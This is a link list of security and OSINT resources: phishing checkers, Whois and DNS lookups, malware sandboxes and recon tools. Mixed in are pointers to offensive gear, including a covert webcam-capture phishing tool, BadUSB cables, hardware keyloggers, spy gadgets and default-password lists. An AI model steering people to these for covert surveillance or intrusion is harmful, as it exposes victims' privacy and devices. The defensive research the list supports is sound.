- [https://github.com/hasanfirnas/symbiote](https://github.com/hasanfirnas/symbiote) Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. By requesting camera permission on the victim's device, this script can take pictures covertly.
- [https://easydmarc.com/tools/phishing-url](https://easydmarc.com/tools/phishing-url) Phishing Link (URL) & email checker
- [https://github.com/mitchellkrogza/Phishing.Database](https://github.com/mitchellkrogza/Phishing.Database) Phishing Domains, URLs websites and threats database.
- [https://isitphishing.org/](https://isitphishing.org/) Type what you want to test for phishing
- [https://www.ncsc.gov.uk/collection/phishing-scams](https://www.ncsc.gov.uk/collection/phishing-scams)
- [https://openphish.com/phishing_activity.html](https://openphish.com/phishing_activity.html) ; [https://phishing.army/](https://phishing.army/) blocklists
- [https://phishcheck.me/](https://phishcheck.me/) Find out what's lurking behind that URL.
- [https://phishunt.io/](https://phishunt.io/) Active websites that are suspected of being phishing.
- [https://phishing-initiative.eu/contrib/](https://phishing-initiative.eu/contrib/) Verify or report a website.
- [https://www.phishlabs.com/blog/](https://www.phishlabs.com/blog/) - threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list.
- [https://phishstats.info/](https://phishstats.info/)
- [https://phishtank.org/index.php](https://phishtank.org/index.php) PhishTank is a collaborative clearing house for data and information about phishing on the Internet. Alternative site [https://www.phishtank.com/](https://www.phishtank.com/)
- [https://www.phishtank.com/](https://www.phishtank.com/) ; [https://www.phishtool.com/](https://www.phishtool.com/)
- [https://threatcop.com/phishing-url-checker](https://threatcop.com/phishing-url-checker)
- [Should I Block It?](https://shouldiblockit.com/)
- https://www.nirsoft.net/
- https://start.me/p/ydqwxP/rss-feeds
- https://youtu.be/W8HG3sLsp8Y
- [https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/](https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/)
- [https://www.tindie.com/products/aprbrother/evil-crow-cable/](https://www.tindie.com/products/aprbrother/evil-crow-cable/)
- [https://www.wallofsheep.com/pages/juice](https://www.wallofsheep.com/pages/juice) (juice jacking)
- [https://zsecurity.org/product/badusb-keystroke-injection-cable/](https://zsecurity.org/product/badusb-keystroke-injection-cable/)
- [https://twitter.com/androidmalware2/status/1679110865331576833](https://twitter.com/androidmalware2/status/1679110865331576833) Bruteforcing PIN protection of popular app using $3 ATTINY85
- [https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/](https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/)
- [https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9](https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9)
- [http://www.airdrivewifi.com/](http://www.airdrivewifi.com/)
- [https://counterespionage.com/malicious-usb-cables/](https://counterespionage.com/malicious-usb-cables/)
- [https://dstike.com/products/dstike-wifi-deauther-mini](https://dstike.com/products/dstike-wifi-deauther-mini)
- [https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0](https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0) if link does not work then search for digispark on eBay
- [https://en.rattibha.com/thread/1827621860193763785](https://en.rattibha.com/thread/1827621860193763785) SPY GADGETS
- [https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4](https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4)
- [https://flipperzero.one/](https://flipperzero.one/)
- [https://greatscottgadgets.com/hackrf/](https://greatscottgadgets.com/hackrf/)
- [https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device](https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device)
- [https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910](https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910)
- [https://hak5.org/](https://hak5.org/)
- [https://www.keelog.com/](https://www.keelog.com/)
- [https://www.keydemon.com/en/](https://www.keydemon.com/en/)
- [https://www.keyghost.com/](https://www.keyghost.com/)
- [https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi](https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi)
- [https://www.mobile-hacker.com/](https://www.mobile-hacker.com/)
- [https://samy.pl/magspoof/](https://samy.pl/magspoof/)
- [https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea](https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea)
- [https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/](https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/)
- [https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable](https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable)
- [https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf](https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf)
- [https://start.me/p/Wp1kpe/socmint](https://start.me/p/Wp1kpe/socmint)
- [https://start.me/p/RMKeQv/search-social-media](https://start.me/p/RMKeQv/search-social-media)
- [https://start.me/p/4K0DXg/social-media](https://start.me/p/4K0DXg/social-media)
- [https://start.me/p/b5MG5r/social-media-intelligence-socmint](https://start.me/p/b5MG5r/social-media-intelligence-socmint)
- [https://start.me/p/z4Lb6M/social-toolkit](https://start.me/p/z4Lb6M/social-toolkit)
- [https://start.me/p/ADr4qn/05-socmint](https://start.me/p/ADr4qn/05-socmint)
- [https://cirt.net/passwords](https://cirt.net/passwords) Default Passwords
- [https://www.routerpasswords.com/](https://www.routerpasswords.com/) Default passwords
- [https://codefinder.org/](https://codefinder.org/) Reposearch
- [https://www.copyscape.com/](https://www.copyscape.com/)
- [https://github.com/google/codesearch](https://github.com/google/codesearch)
- [https://hackertarget.com/reverse-analytics-search/](https://hackertarget.com/reverse-analytics-search/)
- [https://nerdydata.com/](https://nerdydata.com/)
- [https://publicwww.com/](https://publicwww.com/)
- [https://searchcode.com/](https://searchcode.com/)
- [https://snipplr.com/](https://snipplr.com/)
- [https://www.webfinery.com/search](https://www.webfinery.com/search)
- [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) ; [www.elevenpaths.com](http://www.elevenpaths.com/) – FOCA an on-line hidden/meta data locator for a variety of file types
- [https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca](https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca) also check out [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) FOCA (Fingerprinting Organisations with Collected Archives) is a tool written by ElevenPaths that can be used to scan, analyse, extract and classify information from remote web servers and their hidden information.
- [https://jimpl.com/](https://jimpl.com/) Online EXIF data viewer. Uncover hidden metadata from your photos. Find when and where the picture was taken. Remove EXIF data from the image to protect your personal info.
- [https://metashieldclean-up.tu.com/](https://metashieldclean-up.tu.com/)
- [https://www.extractmetadata.com/](https://www.extractmetadata.com/) - an on-line hidden/meta data locator for a variety of file types
- [https://start.me/p/6rqQbo/security-news](https://start.me/p/6rqQbo/security-news)
- [https://start.me/p/ydqwxP/rss-feeds](https://start.me/p/ydqwxP/rss-feeds)
- [https://start.me/p/wMrA5z/cyber-threat-intelligence](https://start.me/p/wMrA5z/cyber-threat-intelligence)
- [https://start.me/p/OmOrJb/threat-hunting](https://start.me/p/OmOrJb/threat-hunting)
- [https://start.me/p/aN5jX8/malware-analysis](https://start.me/p/aN5jX8/malware-analysis)

Whois

Whois was affected by GDPR

- [https://d09r.github.io/assay-url-inspection-tools/](https://d09r.github.io/assay-url-inspection-tools/)
- [https://inteltechniques.com/tools/Domain.html](https://inteltechniques.com/tools/Domain.html)
- [https://www.godaddy.com/en-uk/whois](https://www.godaddy.com/en-uk/whois)
- [https://gwhois.org/](https://gwhois.org/)
- [https://iplogger.org/whois/](https://iplogger.org/whois/)
- [https://lookup.icann.org/en](https://lookup.icann.org/en)
- [https://osint.hippie.cat/](https://osint.hippie.cat/) Select domain
- [https://osint.sh/whoishistory/](https://osint.sh/whoishistory/)
- [https://ping.eu/](https://ping.eu/)
  Online Ping, Traceroute, DNS lookup, WHOIS, Port check, Reverse lookup, Proxy checker, Bandwidth meter, Network calculator, Network mask calculator, Country by IP, Unit converter
- [https://www.reversewhois.io/](https://www.reversewhois.io/)
- [https://www.ripe.net/](https://www.ripe.net/) ; [https://start.me/p/ek2p4x/internetrecherche-2-0](https://start.me/p/ek2p4x/internetrecherche-2-0) (IP WHOIS~)
- [http://www.tcpiputils.com/tools#domain](http://www.tcpiputils.com/tools#domain) ; [https://viewdns.info/](https://viewdns.info/)
- [https://www.whois.com/](https://www.whois.com/)
- [https://whois.icann.org/en/](https://whois.icann.org/en/)
- [https://www.whoxy.com/](https://www.whoxy.com/) whoxy.com ([whoxy.com/qa.com](http://whoxy.com/qa.com))
- [https://whois.domaintools.com/](https://whois.domaintools.com/)
- [https://whoisology.com/](https://whoisology.com/)
- [https://www.yougetsignal.com/tools/whois-lookup/](https://www.yougetsignal.com/tools/whois-lookup/)
- [https://who.is/](https://who.is/)
- [https://www.whois.com/whois/](https://www.whois.com/whois/)
- [https://whois.domaintools.com/qa.com](https://whois.domaintools.com/qa.com) (change the end for target)

Sandbox

- Joe Sandbox - [https://www.joesandbox.com/](https://www.joesandbox.com/) & Cuckoo Sandbox - [https://cuckoo.cert.ee/](https://cuckoo.cert.ee/)
- [https://github.com/CYB3RMX/Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe) All in one Malware analysis tool
- [https://urlscan.io/](https://urlscan.io/)
- [https://www.malwarebytes.com/](https://www.malwarebytes.com/)
- [https://www.hybrid-analysis.com/](https://www.hybrid-analysis.com/)
- [https://www.virustotal.com/gui/home/upload](https://www.virustotal.com/gui/home/upload)
- [https://any.run/](https://any.run/)
- [https://malwareanalysis.tools/](https://malwareanalysis.tools/)
- [https://malpedia.caad.fkie.fraunhofer.de/families](https://malpedia.caad.fkie.fraunhofer.de/families) Malware Families
- [https://maltiverse.com/trial](https://maltiverse.com/trial)
- [https://socradar.io/labs/ioc-radar/](https://socradar.io/labs/ioc-radar/)
- [https://tria.ge/](https://tria.ge/) Triage, also known as the Triage Sandbox, is an advanced malware sandboxing solution initially created by Hatching. It provides users with the ability to execute malware samples within a secure and isolated environment, enabling the analysis of their actions and evaluation of their potential risks.
- [https://start.me/p/m6aeXo/cybersecurity-ctfs-tools](https://start.me/p/m6aeXo/cybersecurity-ctfs-tools)
- [https://start.me/p/X25q7l/threat-informed-defense-ecosystem](https://start.me/p/X25q7l/threat-informed-defense-ecosystem)
- [https://start.me/p/m6bBNv/triage-investigations-ir](https://start.me/p/m6bBNv/triage-investigations-ir)
- [https://virusscan.jotti.org/en](https://virusscan.jotti.org/en)
- [https://www.inetsim.org/](https://www.inetsim.org/) INetSim is a software suite for simulating common internet services in a lab environment, e.g. for analysing the network behaviour of unknown malware samples.

Domain tools DNS

- [https://dnsdumpster.com/](https://dnsdumpster.com/)
- [https://www.robtex.com/](https://www.robtex.com/)
- [https://threatcrowd.org/](https://threatcrowd.org/) This service provides a unique view of the domains associated with your target.
- [https://web-check.as93.net/](https://web-check.as93.net/)
- [https://informationlaundromat.com/](https://informationlaundromat.com/)
- [https://urlscan.io/](https://urlscan.io/)
- [https://subgraph.com/vega/](https://subgraph.com/vega/)

recon

- OSINT Framework/Inteltechniques – a website directory of data discovery and gathering tools for almost any kind of source or platform. [https://osintframework.com/](https://osintframework.com/) or [https://inteltechniques.com/tools/index.html](https://inteltechniques.com/tools/index.html)
- Spiderfoot - Automates OSINT for threat intelligence and mapping your attack surface.
  [https://github.com/smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) & [https://www.spiderfoot.net/attack-surface-monitoring/](https://www.spiderfoot.net/attack-surface-monitoring/)
- Google Dorks – OSINT data gathering method using clever Google search queries with advanced arguments. [https://pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking) [https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/](https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/)
- [Shodan.io](http://shodan.io/) – a search engine for online devices/IOT and a way to get insights into any weaknesses they may have. [https://www.shodan.io/](https://www.shodan.io/)
- [https://censys.com/](https://censys.com/)
- [https://www.zoomeye.org/](https://www.zoomeye.org/) - advertised as China’s first cyberspace search engine, constantly updated, and developed with new features.
- Maltego – an OSINT tool for gathering information and bringing it all together for graphical correlation analysis. [https://www.maltego.com/](https://www.maltego.com/)
- Metasploit – a powerful penetration testing tool that can find network vulnerabilities and even be used to exploit them. [https://www.metasploit.com/](https://www.metasploit.com/)
- Recon-ng – an open-source web reconnaissance tool developed in Python that continues to grow as developers contribute to its capabilities. [https://www.kali.org/tools/recon-ng/](https://www.kali.org/tools/recon-ng/)
- Aircrack-ng – a Wi-Fi network security testing and cracking tool that can be used both defensively and offensively to find compromised networks. [https://www.aircrack-ng.org/](https://www.aircrack-ng.org/)
- Burpsuite is an integrated platform for performing security testing of web applications.
  Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. [https://www.kali.org/tools/burpsuite/](https://www.kali.org/tools/burpsuite/)

[^1]: